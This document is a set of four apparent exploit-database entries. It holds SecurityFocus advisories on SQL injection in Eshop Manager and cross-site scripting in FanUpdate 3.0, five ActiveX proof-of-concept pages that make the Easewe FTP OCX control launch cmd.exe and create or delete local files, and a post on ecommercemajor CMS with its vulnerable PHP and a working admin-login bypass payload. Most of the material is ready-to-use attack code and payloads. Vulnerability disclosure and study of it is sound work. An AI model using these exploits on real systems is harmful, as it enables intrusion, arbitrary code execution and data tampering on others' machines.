source: https://www.securityfocus.com/bid/48391/info Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/path/catalogue.php?id_shop=7[SQLI] http://www.example.com/path/article.php?id_article=7[SQLI] http://www.example.com/path/banniere.php?id_article=7[SQLI] http://www.example.com/path/detail_news.php?id_article=7[SQLI] http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]

source: https://www.securityfocus.com/bid/48392/info FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. FanUpdate 3.0 is vulnerable; other versions may also be affected. http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E

source: https://www.securityfocus.com/bid/48393/info Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities. Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers. Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 1. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Execute arg1 ,arg2 ,arg3 End Sub </script> </html> 2. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Run arg1 ,arg2 ,arg3 End Sub </script> </html> 3. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\Filename_to_create" target.CreateLocalFile arg1 End Sub </script> </html> 4. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="Directorypath\Directory" target.CreateLocalFolder arg1 End Sub </script> </html> 5. <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\Filename_to_delete" target.DeleteLocalFile arg1 End Sub </script> </html> <HTML> Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br> <br> Description There is Insecure Method in (LocalFileCreate) fonction<br> Found By : coolkaveh<br> <title>Exploited By : coolkaveh </title> <BODY> <object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object> <SCRIPT> function Do_it() { File = "kaveh.txt" cyber.LocalFileCreate(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> </body> </HTML>

################################################################################################## #Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass #Author : Manish Kishan Tanwar #Home page Link : https://github.com/xlinkerz/ecommerceMajor #Date : 22/01/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi #email : manish.1046@gmail.com ################################################################################################## //////////////////////// /// Overview: //////////////////////// ecommercemajor is the php based CMS for ecommerce portal /////////////////////////////// // Vulnerability Description: /////////////////////////////// SQL injection vulnerability:- ============================== in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability --------------------- $getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc"; --------------------- POC http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI Authentication Bypass:- ============================== file index.php under directory __admin has SQL injection vulnerability parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue. vulnerable code is ------------------- if(isset($_POST[login])) { $check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'"; $checkresult=mysql_query($check); $checkcount=mysql_num_rows($checkresult); if($checkcount>0) { $checkrow=mysql_fetch_array($checkresult); $_SESSION[adminname]=$checkrow[adminname]; $_SESSION[adminloginstatus]="success"; echo "<script>window.location='home.php';</script>"; } -------------------- POC open admin panel http://127.0.0.1/ecommercemajor/__admin/ username: ' or '1337'='1337 password: ' or '1337'='1337 --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das ############################################################################################# --==[[Love to]]==-- #Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3